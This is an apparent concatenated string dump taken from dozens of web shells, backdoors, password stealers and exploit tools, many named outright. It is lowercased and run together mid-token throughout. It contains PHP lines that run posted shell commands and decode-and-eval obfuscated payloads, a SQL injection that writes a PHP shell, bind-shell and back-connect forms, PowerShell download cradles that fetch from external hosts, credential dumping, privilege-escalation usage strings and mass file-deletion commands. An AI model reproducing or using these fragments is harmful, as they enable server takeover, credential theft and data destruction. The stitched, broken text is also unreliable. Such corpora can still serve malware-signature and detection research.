\\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
/bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . 
$directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' 
color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. 
- sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? 
echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... 
1 enablelua /t reg_dword /d 0 /f*a01**a02**a03**a04**a05**a06*hostsettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dlldefpathhknamehportipathpanelpathrooturlvirusscanpronoipstreamwebcamdomain_passwordstub.form1.resourcesf
1 vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
1 error starting filespy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>should be logging to screen...filmon: unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 stub.pdbcie7passwordsnjloggertaskmgrkillerabccba%
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. 
twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 getsystemdirectorygetwindowsdirectoryisbadreadptrisbadwriteptrurldownloadtofile{\\field{\\*\\fldinst { includepicture.php?id=\\\\* mergeformat \\\\d}}{\\fldrslt}}userformuserloginforminvalid username or passwordpostupload_
1 modstartmodstoptoo long data for this type of transportnot enough server resources to complete operationtask not execute. arg file failed.global\\msctf.shared.mutex.zrxpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
1 %s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c active/maximum host thread: %d/%d, current/maximum thread: %d/%d, time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\hscan.log[%s]: found cisco enable password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
1 target is share namecould not make udpnetbios header -- bailingrequest non-nt session key* listening post dll %s() returned error code %d.wsaerrortoomanyprocessesservererrorbadnamepassword*
1 restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 danderspritzdanderspritzchimneypool addresgetting remote timeretrievedadded ops library to python search pathtarget: z0.0.0.1psp_avoidancepassworddumpinjectdlleventlogeditprocessmodifymcl_ntelevationmcl_ntnativeapimcl_threatinjectmcl_ntmemoryvailablezsfouglr|||command executed successfully\\release\\bot fresh.pdbc
1 {mauthor usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
1 n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 enter your own password here
1 setx tor_control_passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
1 probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 [attempt-error] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
1 software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 user:password --> %s:%suser:password@host --> %s:%s@%sxp3
1 wbruteerror.txtgood.txtsource.txtbad.txtgenerator ip@login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
1 rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 user:password --> %s:%suser:password@host --> %s:%s@%sxp3
1 get-content $env:public\\libraries\\update.vbs) -replacewss.run \"powershell.exe \" & chr(34) & \"& {waitfor haha /t 2}\" & chr(34), 0call extract(updatevbs, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\update.vbs\")createobject(\"wscript.shell\").run cmd, 0ojgdsb2jhbdptewhvc3qgpse9nrt0ijxb1ymxpyyvctglicmfyawvzxu2v0ihdzcya9ienyzwf0zu9iamvjdcgid1njcmlwdc5tagvjhnjcmlwdgrpcia9ifnwbgl0lvbhdggglvbhcmvudcatugf0acadqptzxqgd3nzid0gq3jlyxrlt2jqzwnd2hvyw1picygag9zdg5hbdownloadexecute=\"powershell \"\"&{$r=get-random;$wc=(new-object system.net.webclient);$wc.downloadfile(-executionpolicy bypass -file \"&home&\"dns.ps1\"createobject(\"wscript.shell\").run replace(downloadexecute,\"-_\",\"bat\")createobject(\"wscript.shell\").run dnscmd,0http://winodwsupdates.me%userprofile%\\appdata\\local\\microsoft\\ $fdn=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('&{$rn = get-random; $id = 'tr') -replace '__',('dns'+$id) | \\upd.vbsschtasks /create /f /sc minute /mo ') -replace '__',('htp'+$id) | &{$rn = get-random -minimum 1 -maximum 10000; $id = 'azhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\libraries\\fireueye.vbs\
1 %d of %d target%s%scompleted, %lu valid password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 invoke-bypassuacs
1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 beijing1del /f /s /q %systemdrive%\\*.log del /f /s /q %windir%\\*.bak del /f /s /q %systemdrive%\\*.chk del /f /s /q %systemdrive%\\*.tmp del /f /q %userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
1 exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'password.txtloginprompta
